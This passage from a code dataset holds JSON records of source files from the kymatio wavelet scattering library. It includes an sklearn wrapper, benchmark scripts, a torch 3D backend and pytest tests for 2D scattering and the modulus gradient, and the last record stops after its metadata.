"alpha_fraction": 0.752293586730957,
"alphanum_fraction": 0.7844036817550659,
"avg_line_length": 37.47058868408203,
"blob_id": "df8bb36d58ac7dced9c4e6805eb5e532b4e6635d",
"content_id": "393861b691ff3cedcdd52197ca022fe53ff79321",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 654,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 17,
"path": "/kymatio/sklearn.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from .scattering1d.frontend.sklearn_frontend \\\n import ScatteringTransformer1D as Scattering1D\nfrom .scattering2d.frontend.sklearn_frontend \\\n import ScatteringTransformer2D as Scattering2D\nfrom .scattering3d.frontend.sklearn_frontend \\\n import HarmonicScatteringTransformer3D as HarmonicScattering3D\n\nScattering1D.__module__ = 'kymatio.sklearn'\nScattering1D.__name__ = 'Scattering1D'\n\nScattering2D.__module__ = 'kymatio.sklearn'\nScattering2D.__name__ = 'Scattering2D'\n\nHarmonicScattering3D.__module__ = 'kymatio.sklearn'\nHarmonicScattering3D.__name__ = 'HarmonicScattering3D'\n\n__all__ = ['Scattering1D', 'Scattering2D', 'HarmonicScattering3D']\n"
},
{
"alpha_fraction": 0.41283783316612244,
"alphanum_fraction": 0.46148648858070374,
"avg_line_length": 28.600000381469727,
"blob_id": "17053f3e7738874e87dd26385701acb1c0154019",
"content_id": "ee9a1c68ce6688f20a5d4057fdd5ec2f17e15123",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1480,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 50,
"path": "/benchmarks/benchmarks/scattering3d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\nimport kymatio.scattering3d.backend as backend\nfrom kymatio import HarmonicScattering3D\n\nclass BenchmarkHarmonicScattering3D:\n params = [\n [\n { # Small. 32x32x32, 2 scales, 2 harmonics\n \"J\": 2,\n \"shape\": (32, 32, 32),\n \"L\": 2,\n },\n { # Large. 128x128x128, 2 scales, 2 harmonics\n \"J\": 2,\n \"shape\": (128, 128, 128),\n \"L\": 2,\n },\n { # A case with many scales (J=6) and few harmonics (L=1)\n \"J\": 6,\n \"shape\": (128, 128, 128),\n \"L\": 1,\n },\n { # A case with few scales (J=2) and many harmonics (L=6)\n \"J\": 2,\n \"shape\": (32, 32, 32),\n \"L\": 4,\n }\n ],\n [\n 1,\n ]\n ]\n param_names = [\"sc_params\", \"batch_size\"]\n\n def setup(self, sc_params, batch_size):\n scattering = HarmonicScattering3D(**sc_params)\n scattering.cpu()\n x = torch.randn(\n batch_size,\n sc_params[\"shape\"][0], sc_params[\"shape\"][1], sc_params[\"shape\"][2],\n dtype=torch.float32)\n x.cpu()\n self.scattering = scattering\n self.x = x\n\n def time_constructor(self, sc_params, batch_size):\n HarmonicScattering3D(**sc_params)\n\n def time_forward(self, sc_params, batch_size):\n (self.scattering).forward(self.x)\n"
},
{
"alpha_fraction": 0.5305123329162598,
"alphanum_fraction": 0.5409342050552368,
"avg_line_length": 31.37398338317871,
"blob_id": "0a9eebf766e5bcabccbb49a60edce94e548d4dea",
"content_id": "b4a709706feec11674bb061683cc74c37c866867",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7964,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 246,
"path": "/kymatio/scattering3d/backend/torch_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\nimport warnings\n\nBACKEND_NAME = 'torch'\nfrom collections import namedtuple\nfrom packaging import version\n\n\ndef _is_complex(input):\n \"\"\"Checks if input is complex.\n\n Parameters\n ----------\n input : tensor\n Input to be checked if complex.\n Returns\n -------\n output : boolean\n Returns True if complex (i.e. final dimension is 2), False\n otherwise.\n \"\"\"\n return input.shape[-1] == 2\n\n\ndef complex_modulus(input_array):\n \"\"\"Computes complex modulus.\n\n Parameters\n ----------\n input_array : tensor\n Input tensor whose complex modulus is to be calculated.\n Returns\n -------\n modulus : tensor\n Tensor the same size as input_array. modulus[..., 0] holds the\n result of the complex modulus, modulus[..., 1] = 0.\n\n \"\"\"\n modulus = torch.zeros_like(input_array)\n modulus[..., 0] = torch.sqrt((input_array ** 2).sum(-1))\n return modulus\n\n\ndef modulus_rotation(x, module=None):\n \"\"\"Used for computing rotation invariant scattering transform coefficents.\n\n Parameters\n ----------\n x : tensor\n Size (batchsize, M, N, O, 2).\n module : tensor\n Tensor that holds the overall sum. If none, initializes the tensor\n to zero (default).\n Returns\n -------\n output : torch tensor\n Tensor of the same size as input_array. It holds the output of\n the operation::\n $\\\\sqrt{\\\\sum_m (\\\\text{input}_\\\\text{array} \\\\star \\\\psi_{j,l,m})^2)}$\n which is covariant to 3D translations and rotations.\n \"\"\"\n if module is None:\n module = torch.zeros_like(x)\n else:\n module = module ** 2\n module[..., 0] += (x ** 2).sum(-1)\n return torch.sqrt(module)\n\n\ndef compute_integrals(input_array, integral_powers):\n \"\"\"Computes integrals.\n\n Computes integrals of the input_array to the given powers.\n Parameters\n ----------\n input_array : torch tensor\n Size (B, M, N, O), where B is batch_size, and M, N, O are spatial\n dims.\n integral_powers : list\n List of P positive floats containing the p values used to\n compute the integrals of the input_array to the power p (l_p\n norms).\n Returns\n -------\n integrals : torch tensor\n Tensor of size (B, P) containing the integrals of the input_array\n to the powers p (l_p norms).\n \"\"\"\n integrals = torch.zeros((input_array.shape[0], len(integral_powers)),\n device=input_array.device)\n for i_q, q in enumerate(integral_powers):\n integrals[:, i_q] = (input_array ** q).view(\n input_array.shape[0], -1).sum(1)\n return integrals\n\nif version.parse(torch.__version__) >= version.parse('1.8'):\n def fft(input, inverse=False):\n \"\"\"Interface with torch FFT routines for 3D signals.\n fft of a 3d signal\n Example\n -------\n x = torch.randn(128, 32, 32, 32, 2)\n\n x_fft = fft(x)\n x_ifft = fft(x, inverse=True)\n Parameters\n ----------\n x : tensor\n Complex input for the FFT.\n inverse : bool\n True for computing the inverse FFT.\n\n Raises\n ------\n TypeError\n In the event that x does not have a final dimension 2 i.e. not\n complex.\n\n Returns\n -------\n output : tensor\n Result of FFT or IFFT.\n \"\"\"\n if not _is_complex(input):\n raise TypeError('The input should be complex (e.g. 
last dimension is 2)')\n if inverse:\n return torch.view_as_real(torch.fft.ifftn(torch.view_as_complex(input), dim=[-1, -2, -3]))\n return torch.view_as_real(torch.fft.fftn(torch.view_as_complex(input), dim=[-1, -2, -3]))\nelse:\n def fft(input, inverse=False):\n \"\"\"Interface with torch FFT routines for 3D signals.\n fft of a 3d signal\n Example\n -------\n x = torch.randn(128, 32, 32, 32, 2)\n x_fft = fft(x)\n x_ifft = fft(x, inverse=True)\n Parameters\n ----------\n x : tensor\n Complex input for the FFT.\n inverse : bool\n True for computing the inverse FFT.\n Raises\n ------\n TypeError\n In the event that x does not have a final dimension 2 i.e. not\n complex.\n Returns\n -------\n output : tensor\n Result of FFT or IFFT.\n \"\"\"\n if not _is_complex(input):\n raise TypeError('The input should be complex (e.g. last dimension is 2)')\n if inverse:\n return torch.ifft(input, 3)\n return torch.fft(input, 3)\n\ndef cdgmm3d(A, B, inplace=False):\n \"\"\"Complex pointwise multiplication.\n\n Complex pointwise multiplication between (batched) tensor A and tensor B.\n\n Parameters\n ----------\n A : torch tensor\n Complex torch tensor.\n B : torch tensor\n Complex of the same size as A.\n inplace : boolean, optional\n If set True, all the operations are performed inplace.\n\n Raises\n ------\n RuntimeError\n In the event that the tensors are not compatibile for multiplication\n (i.e. the final four dimensions of A do not match with the dimensions\n of B), or in the event that B is not complex, or in the event that the\n type of A and B are not the same.\n TypeError\n In the event that x is not complex i.e. does not have a final dimension\n of 2, or in the event that both tensors are not on the same device.\n\n Returns\n -------\n output : torch tensor\n Torch tensor of the same size as A containing the result of the\n elementwise complex multiplication of A with B.\n \"\"\"\n if not A.is_contiguous():\n warnings.warn(\"cdgmm3d: tensor A is converted to a contiguous array.\")\n A = A.contiguous()\n if not B.is_contiguous():\n warnings.warn(\"cdgmm3d: tensor B is converted to a contiguous array.\")\n B = B.contiguous()\n\n if A.shape[-4:] != B.shape:\n raise RuntimeError('The tensors are not compatible for multiplication.')\n\n if not _is_complex(A) or not _is_complex(B):\n raise TypeError('The input, filter and output should be complex.')\n\n if B.ndimension() != 4:\n raise RuntimeError('The second tensor must be simply a complex array.')\n\n if type(A) is not type(B):\n raise RuntimeError('A and B should be same type.')\n\n if A.device.type != B.device.type:\n raise TypeError('A and B must be both on GPU or both on CPU.')\n\n if A.device.type == 'cuda':\n if A.device.index != B.device.index:\n raise TypeError('A and B must be on the same GPU.')\n\n C = A.new(A.shape)\n\n C[..., 0] = A[..., 0] * B[..., 0] - A[..., 1] * B[..., 1]\n C[..., 1] = A[..., 0] * B[..., 1] + A[..., 1] * B[..., 0]\n\n return C if not inplace else A.copy_(C)\n\n\ndef concatenate(arrays, L):\n S = torch.stack(arrays, dim=1)\n S = S.reshape((S.shape[0], S.shape[1] // (L + 1), (L + 1)) + S.shape[2:])\n return S\n\n\nbackend = namedtuple('backend',\n ['name',\n 'cdgmm3d',\n 'fft',\n 'modulus',\n 'modulus_rotation',\n 'compute_integrals',\n 'concatenate'])\n\nbackend.name = 'torch'\nbackend.cdgmm3d = cdgmm3d\nbackend.fft = fft\nbackend.concatenate = concatenate\nbackend.modulus = complex_modulus\nbackend.modulus_rotation = modulus_rotation\nbackend.compute_integrals = compute_integrals\n"
},
{
"alpha_fraction": 0.5152092576026917,
"alphanum_fraction": 0.5436686873435974,
"avg_line_length": 31.58333396911621,
"blob_id": "b3221c9d4baf52a37e2215305aa5679619ffa271",
"content_id": "d1c73b19cbf44e170d7d1feeb00dbd9014f16de6",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18377,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 564,
"path": "/tests/scattering2d/test_torch_scattering2d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "\"\"\" This script will test the submodules used by the scattering module\"\"\"\n\nimport os\nimport io\nimport numpy as np\nimport torch\nimport pytest\nfrom kymatio import Scattering2D\nfrom torch.autograd import gradcheck\nfrom collections import namedtuple\n\ndevices = ['cpu']\nif torch.cuda.is_available():\n devices.append('cuda')\n\n\nbackends = []\nbackends_devices = []\n\nskcuda_available = False\ntry:\n if torch.cuda.is_available():\n from skcuda import cublas\n import cupy\n skcuda_available = True\nexcept:\n Warning('torch_skcuda backend not available.')\n\n\nif skcuda_available:\n from kymatio.scattering2d.backend.torch_skcuda_backend import backend\n backends.append(backend)\n if 'cuda' in devices:\n backends_devices.append((backend, 'cuda'))\n\n\nfrom kymatio.scattering2d.backend.torch_backend import backend\nbackends.append(backend)\n\nbackends_devices.append((backend, 'cpu'))\nif 'cuda' in devices:\n backends_devices.append((backend, 'cuda'))\n\n\nclass TestPad:\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_Pad(self, backend_device):\n backend, device = backend_device\n\n pad = backend.Pad((2, 2, 2, 2), (4, 4))\n\n x = torch.randn(1, 4, 4)\n x = x.to(device)\n\n z = pad(x)\n\n assert z.shape == (1, 8, 8, 2)\n assert torch.allclose(z[0, 2, 2, 0], x[0, 0, 0])\n assert torch.allclose(z[0, 1, 0, 0], x[0, 1, 2])\n assert torch.allclose(z[0, 1, 1, 0], x[0, 1, 1])\n assert torch.allclose(z[0, 1, 2, 0], x[0, 1, 0])\n assert torch.allclose(z[0, 1, 3, 0], x[0, 1, 1])\n assert torch.allclose(z[..., 1], torch.zeros_like(z[..., 1]))\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_unpad(self, backend_device):\n backend, device = backend_device\n\n x = torch.randn(4, 4)\n x = x.to(device)\n\n y = backend.unpad(x)\n\n assert y.shape == (2, 2)\n assert torch.allclose(y[0, 0], x[1, 1])\n assert torch.allclose(y[0, 1], x[1, 2])\n\n\n# Checked the modulus\nclass TestModulus:\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_Modulus(self, backend_device):\n backend, device = backend_device\n\n modulus = backend.modulus\n x = torch.rand(100, 10, 4, 2).to(device)\n\n y = modulus(x)\n u = torch.squeeze(torch.sqrt(torch.sum(x * x, 3)))\n v = y.narrow(3, 0, 1)\n u = u.squeeze()\n v = v.squeeze()\n assert torch.allclose(u, v)\n\n y = x[..., 0].contiguous()\n with pytest.raises(TypeError) as record:\n modulus(y)\n assert 'should be complex' in record.value.args[0]\n\n y = x[::2, ::2]\n with pytest.raises(RuntimeError) as record:\n modulus(y)\n assert 'contiguous' in record.value.args[0]\n\n @pytest.mark.parametrize('backend', backends)\n def test_cuda_only(self, backend):\n modulus = backend.modulus\n if backend.name.endswith('_skcuda'):\n x = torch.rand(100, 10, 4, 2).cpu()\n with pytest.raises(TypeError) as exc:\n y = modulus(x)\n assert 'Use the torch backend' in exc.value.args[0]\n\n\n# Checked the subsampling\nclass TestSubsampleFourier:\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_SubsampleFourier(self, backend_device):\n backend, device = backend_device\n subsample_fourier = backend.subsample_fourier\n\n x = torch.rand(100, 1, 128, 128, 2).to(device)\n\n y = torch.zeros(100, 1, 8, 8, 2).to(device)\n\n for i in range(8):\n for j in range(8):\n for m in range(16):\n for n in range(16):\n y[...,i,j,:] += x[...,i+m*8,j+n*8,:]\n\n y = y / (16*16)\n\n z = subsample_fourier(x, k=16)\n assert torch.allclose(y, z)\n\n y = x[..., 0]\n with pytest.raises(TypeError) as record:\n 
subsample_fourier(y, k=16)\n assert 'should be complex' in record.value.args[0]\n\n y = x[::2, ::2]\n with pytest.raises(RuntimeError) as record:\n subsample_fourier(y, k=16)\n assert 'should be contiguous' in record.value.args[0]\n\n @pytest.mark.parametrize('backend', backends)\n def test_gpu_only(self, backend):\n subsample_fourier = backend.subsample_fourier\n\n if backend.name.endswith('_skcuda'):\n x = torch.rand(100, 1, 128, 128, 2).cpu()\n with pytest.raises(TypeError) as exc:\n z = subsample_fourier(x, k=16)\n assert 'Use the torch backend' in exc.value.args[0]\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_batch_shape_agnostic(self, backend_device):\n backend, device = backend_device\n subsample_fourier = backend.subsample_fourier\n\n x = torch.rand(100, 1, 8, 128, 128, 2).to(device)\n\n y = torch.zeros(100, 1, 8, 8, 8, 2).to(device)\n\n for i in range(8):\n for j in range(8):\n for m in range(16):\n for n in range(16):\n y[...,i,j,:] += x[...,i+m*8,j+n*8,:]\n\n y = y / (16*16)\n\n z = subsample_fourier(x, k=16)\n assert torch.allclose(y, z)\n\n\n# Check the CUBLAS routines\nclass TestCDGMM:\n @pytest.fixture(params=(False, True))\n def data(self, request):\n real_filter = request.param\n\n x = torch.rand(100, 128, 128, 2).float()\n filt = torch.rand(128, 128, 2).float()\n y = torch.ones(100, 128, 128, 2).float()\n\n if real_filter:\n filt[..., 1] = 0\n\n y[..., 0] = x[..., 0] * filt[..., 0] - x[..., 1] * filt[..., 1]\n y[..., 1] = x[..., 1] * filt[..., 0] + x[..., 0] * filt[..., 1]\n\n if real_filter:\n filt = filt[..., :1].contiguous()\n\n return x, filt, y\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n @pytest.mark.parametrize('inplace', (False, True))\n def test_cdgmm_forward(self, data, backend_device, inplace):\n backend, device = backend_device\n\n x, filt, y = data\n x, filt, y = x.to(device), filt.to(device), y.to(device)\n\n z = backend.cdgmm(x, filt, inplace=inplace)\n\n Warning('Tolerance has been slightly lowered here...')\n # There is a very small meaningless difference for skcuda+GPU\n assert torch.allclose(y, z, atol=1e-7, rtol =1e-6)\n\n @pytest.mark.parametrize('backend', backends)\n def test_gpu_only(self, data, backend):\n x, filt, y = data\n if backend.name.endswith('_skcuda'):\n x = x.cpu()\n filt = filt.cpu()\n\n with pytest.raises(TypeError) as exc:\n z = backend.cdgmm(x, filt)\n assert 'must be CUDA' in exc.value.args[0]\n\n @pytest.mark.parametrize('backend', backends)\n def test_cdgmm_exceptions(self, backend):\n with pytest.raises(RuntimeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 2), torch.empty(4, 3, 2))\n assert 'not compatible' in exc.value.args[0]\n\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 1), torch.empty(4, 5, 1))\n assert 'input should be complex' in exc.value.args[0]\n\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 2), torch.empty(4, 5, 3))\n assert 'should be complex' in exc.value.args[0]\n\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 2),\n torch.empty(4, 5, 1).double())\n assert 'must be of the same dtype' in exc.value.args[0]\n\n if 'cuda' in devices:\n if backend.name.endswith('_skcuda'):\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 2),\n torch.empty(4, 5, 1).cuda())\n assert 'must be cuda tensors' in exc.value.args[0].lower()\n elif not backend.name.endswith('_skcuda'):\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 2),\n 
torch.empty(4, 5, 1).cuda())\n assert 'input must be on gpu' in exc.value.args[0].lower()\n\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 2).cuda(),\n torch.empty(4, 5, 1))\n assert 'input must be on cpu' in exc.value.args[0].lower()\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_contiguity_exception(self, backend_device):\n backend, device = backend_device\n\n x = torch.empty(3, 4, 5, 3).to(device)[..., :2]\n y = torch.empty(4, 5, 3).to(device)[..., :2]\n\n with pytest.raises(RuntimeError) as exc:\n backend.cdgmm(x.contiguous(), y)\n assert 'be contiguous' in exc.value.args[0]\n\n with pytest.raises(RuntimeError) as exc:\n backend.cdgmm(x, y.contiguous())\n assert 'be contiguous' in exc.value.args[0]\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_device_mismatch(self, backend_device):\n backend, device = backend_device\n\n if device == 'cpu':\n return\n\n if torch.cuda.device_count() < 2:\n return\n\n x = torch.empty(3, 4, 5, 2).to('cuda:0')\n y = torch.empty(4, 5, 1).to('cuda:1')\n\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(x, y)\n assert 'must be on the same GPU' in exc.value.args[0]\n\n\nclass TestFFT:\n @pytest.mark.parametrize('backend', backends)\n def test_fft(self, backend):\n x = torch.randn(2, 2, 2)\n\n y = torch.empty_like(x)\n y[0, 0, :] = x[0, 0, :] + x[0, 1, :] + x[1, 0, :] + x[1, 1, :]\n y[0, 1, :] = x[0, 0, :] - x[0, 1, :] + x[1, 0, :] - x[1, 1, :]\n y[1, 0, :] = x[0, 0, :] + x[0, 1, :] - x[1, 0, :] - x[1, 1, :]\n y[1, 1, :] = x[0, 0, :] - x[0, 1, :] - x[1, 0, :] + x[1, 1, :]\n\n z = backend.fft(x, direction='C2C')\n\n assert torch.allclose(y, z)\n\n z = backend.fft(x, direction='C2C', inverse=True)\n\n z = z * 4.0\n\n assert torch.allclose(y, z)\n\n z = backend.fft(x, direction='C2R', inverse=True)\n\n z = z * 4.0\n\n assert z.shape == x.shape[:-1]\n assert torch.allclose(y[..., 0], z)\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_fft_exceptions(self, backend_device):\n backend, device = backend_device\n\n with pytest.raises(RuntimeError) as record:\n backend.fft(torch.empty(2, 2), direction='C2R',\n inverse=False)\n assert 'done with an inverse' in record.value.args[0]\n\n x = torch.rand(4, 4, 1)\n x = x.to(device)\n with pytest.raises(TypeError) as record:\n backend.fft(x)\n assert 'complex' in record.value.args[0]\n\n x = torch.randn(4, 4, 2)\n x = x.to(device)\n y = x[::2, ::2]\n\n with pytest.raises(RuntimeError) as record:\n backend.fft(y)\n assert 'must be contiguous' in record.value.args[0]\n\n\nclass TestBackendUtils:\n @pytest.mark.parametrize('backend', backends)\n def test_concatenate(self, backend):\n x = torch.randn(3, 6, 6)\n y = torch.randn(3, 6, 6)\n z = torch.randn(3, 6, 6)\n\n w = backend.concatenate((x, y, z))\n\n assert w.shape == (x.shape[0],) + (3,) + (x.shape[-2:])\n assert np.allclose(w[:, 0, ...], x)\n assert np.allclose(w[:, 1, ...], y)\n assert np.allclose(w[:, 2, ...], z)\n\n\nclass TestScatteringTorch2D:\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_Scattering2D(self, backend_device):\n backend, device = backend_device\n\n test_data_dir = os.path.dirname(__file__)\n with open(os.path.join(test_data_dir, 'test_data_2d.npz'), 'rb') as f:\n buffer = io.BytesIO(f.read())\n data = np.load(buffer)\n\n x = torch.from_numpy(data['x'])\n S = torch.from_numpy(data['Sx'])\n J = data['J']\n pre_pad = data['pre_pad']\n\n M = x.shape[2]\n N = x.shape[3]\n\n scattering = Scattering2D(J, shape=(M, N), 
pre_pad=pre_pad,\n backend=backend, frontend='torch')\n Sg = []\n x = x.to(device)\n scattering.to(device)\n S = S.to(device)\n Sg = scattering(x)\n assert torch.allclose(Sg, S)\n\n scattering = Scattering2D(J, shape=(M, N), pre_pad=pre_pad,\n max_order=1, frontend='torch',\n backend=backend)\n scattering.to(device)\n\n S1x = scattering(x)\n assert torch.allclose(S1x, S[..., :S1x.shape[-3], :, :])\n\n @pytest.mark.parametrize('backend', backends)\n def test_gpu_only(self, backend):\n if backend.name.endswith('_skcuda'):\n scattering = Scattering2D(3, shape=(32, 32), backend=backend,\n frontend='torch')\n\n x = torch.rand(32, 32)\n\n with pytest.raises(TypeError) as ve:\n Sg = scattering(x)\n assert 'CUDA' in ve.value.args[0]\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_batch_shape_agnostic(self, backend_device):\n backend, device = backend_device\n\n J = 3\n L = 8\n shape = (32, 32)\n\n shape_ds = tuple(n // (2 ** J) for n in shape)\n\n S = Scattering2D(J, shape, L, backend=backend, frontend='torch')\n\n with pytest.raises(RuntimeError) as ve:\n S(torch.zeros(()))\n assert 'at least two' in ve.value.args[0]\n\n with pytest.raises(RuntimeError) as ve:\n S(torch.zeros((32, )))\n assert 'at least two' in ve.value.args[0]\n\n x = torch.zeros(shape)\n\n x = x.to(device)\n S.to(device)\n\n Sx = S(x)\n\n assert len(Sx.shape) == 3\n assert Sx.shape[-2:] == shape_ds\n\n n_coeffs = Sx.shape[-3]\n\n test_shapes = ((1,) + shape, (2,) + shape, (2, 2) + shape,\n (2, 2, 2) + shape)\n\n for test_shape in test_shapes:\n x = torch.zeros(test_shape)\n\n x = x.to(device)\n\n Sx = S(x)\n\n assert len(Sx.shape) == len(test_shape) + 1\n assert Sx.shape[-2:] == shape_ds\n assert Sx.shape[-3] == n_coeffs\n assert Sx.shape[:-3] == test_shape[:-2]\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_scattering2d_errors(self, backend_device):\n backend, device = backend_device\n\n S = Scattering2D(3, (32, 32), backend=backend, frontend='torch')\n\n S.to(device)\n\n with pytest.raises(TypeError) as record:\n S(None)\n assert 'input should be' in record.value.args[0]\n\n x = torch.randn(4,4)\n y = x[::2,::2]\n\n with pytest.raises(RuntimeError) as record:\n S(y)\n assert 'must be contiguous' in record.value.args[0]\n\n x = torch.randn(31, 31)\n\n with pytest.raises(RuntimeError) as record:\n S(x)\n assert 'Tensor must be of spatial size' in record.value.args[0]\n\n S = Scattering2D(3, (32, 32), pre_pad=True, backend=backend,\n frontend='torch')\n\n with pytest.raises(RuntimeError) as record:\n S(x)\n assert 'Padded tensor must be of spatial size' in record.value.args[0]\n\n x = torch.randn(8,8)\n S = Scattering2D(2, (8, 8), backend=backend, frontend='torch')\n\n x = x.to(device)\n S = S.to(device)\n if not (device == 'cpu' and backend.name.endswith('_skcuda')):\n y = S(x)\n assert x.device == y.device\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_input_size_agnostic(self, backend_device):\n backend, device = backend_device\n\n for N in [31, 32, 33]:\n for J in [1, 2, 4]:\n scattering = Scattering2D(J, shape=(N, N), backend=backend,\n frontend='torch')\n x = torch.zeros(3, 3, N, N)\n\n x = x.to(device)\n scattering.to(device)\n\n S = scattering(x)\n scattering = Scattering2D(J, shape=(N, N), pre_pad=True,\n backend=backend, frontend='torch')\n x = torch.zeros(3, 3, scattering.M_padded, scattering.N_padded)\n\n x = x.to(device)\n scattering.to(device)\n\n N = 32\n J = 5\n scattering = Scattering2D(J, shape=(N, N), backend=backend,\n 
frontend='torch')\n x = torch.zeros(3, 3, N, N)\n\n x = x.to(device)\n scattering.to(device)\n\n S = scattering(x)\n assert S.shape[-2:] == (1, 1)\n\n N = 32\n J = 5\n scattering = Scattering2D(J, shape=(N+5, N), backend=backend,\n frontend='torch')\n x = torch.zeros(3, 3, N+5, N)\n\n x = x.to(device)\n scattering.to(device)\n\n S = scattering(x)\n assert S.shape[-2:] == (1, 1)\n\n def test_inputs(self):\n fake_backend = namedtuple('backend', ['name',])\n fake_backend.name = 'fake'\n\n with pytest.raises(ImportError) as ve:\n scattering = Scattering2D(2, shape=(10, 10), frontend='torch',\n backend=fake_backend)\n assert 'not supported' in ve.value.args[0]\n\n with pytest.raises(RuntimeError) as ve:\n scattering = Scattering2D(10, shape=(10, 10), frontend='torch')\n assert 'smallest dimension' in ve.value.args[0]\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_gradients(self, backend_device):\n backend, device = backend_device\n\n if backend.name.endswith('_skcuda'):\n pytest.skip('The gradients are currently not implemented with '\n 'the skcuda backend.')\n else:\n scattering = Scattering2D(2, shape=(8, 8), backend=backend,\n frontend='torch').double().to(device)\n x = torch.rand(2, 1, 8, 8).double().to(device).requires_grad_()\n gradcheck(scattering, x, nondet_tol=1e-5)\n"
},
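The `TestSubsampleFourier` cases above verify, by explicit block averaging, that subsampling in space corresponds to periodizing the Fourier transform. A minimal 1-D sketch of that identity follows; the `subsample_fourier` here is a toy of my own naming, not the backend's implementation.

```python
import numpy as np

def subsample_fourier(x_f, k):
    # Periodization: each output bin averages the k aliases that fold onto it.
    N = x_f.shape[-1]
    return x_f.reshape(x_f.shape[:-1] + (k, N // k)).mean(axis=-2)

x = np.random.randn(256) + 1j * np.random.randn(256)
y = np.fft.ifft(subsample_fourier(np.fft.fft(x), 4))

# Decimation in time is periodization in frequency.
assert np.allclose(y, x[::4])
```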
{
"alpha_fraction": 0.6014492511749268,
"alphanum_fraction": 0.6217391490936279,
"avg_line_length": 25.538461685180664,
"blob_id": "477171dbe73688130bd9c2aac6edd38b310ecaae",
"content_id": "a1f3adab4fce5d2d3f4d3fab04256b58cf708a18",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 690,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 26,
"path": "/tests/general/test_torch_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\nimport pytest\nfrom kymatio.backend.torch_backend import ModulusStable, modulus\n\n\ndef test_modulus(random_state=42):\n \"\"\"\n Tests the stability and differentiability of modulus\n \"\"\"\n\n x = torch.randn(100, 4, 128, 2, requires_grad=True)\n x_grad = x.clone()\n x_abs = modulus(x)\n\n x_grad[..., 0] = x[..., 0] / x_abs\n x_grad[..., 1] = x[..., 1] / x_abs\n\n class FakeContext:\n def save_for_backward(self, *args):\n self.saved_tensors = args\n\n ctx = FakeContext()\n y = ModulusStable.forward(ctx, x)\n y_grad = torch.ones_like(y)\n x_grad_manual = ModulusStable.backward(ctx, y_grad)\n assert torch.allclose(x_grad_manual, x_grad)\n"
},
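The test above pins down the backward rule of the stable modulus: the gradient of |x| is x / |x| away from the origin and, by convention, zero at it. A hedged NumPy sketch of that rule (the function name is illustrative):

```python
import numpy as np

def modulus_grad(x):
    # x is a (..., 2) real view of a complex tensor; the gradient of |x|
    # is x / |x|, with the convention that it is 0 where |x| vanishes.
    r = np.sqrt((x ** 2).sum(axis=-1, keepdims=True))
    return np.divide(x, r, out=np.zeros_like(x), where=r > 0)

x = np.array([[3.0, 4.0], [0.0, 0.0]])
print(modulus_grad(x))  # [[0.6 0.8], [0.  0. ]]
```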
{
"alpha_fraction": 0.42900997400283813,
"alphanum_fraction": 0.4673829674720764,
"avg_line_length": 26.723403930664062,
"blob_id": "1ffd4c1367aae8681f8ca4360f3f9e64889e466a",
"content_id": "b9f7a135eeabe4ee0687d5c2f7cf3c6c76dd0c50",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1303,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 47,
"path": "/benchmarks/benchmarks/scattering2d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
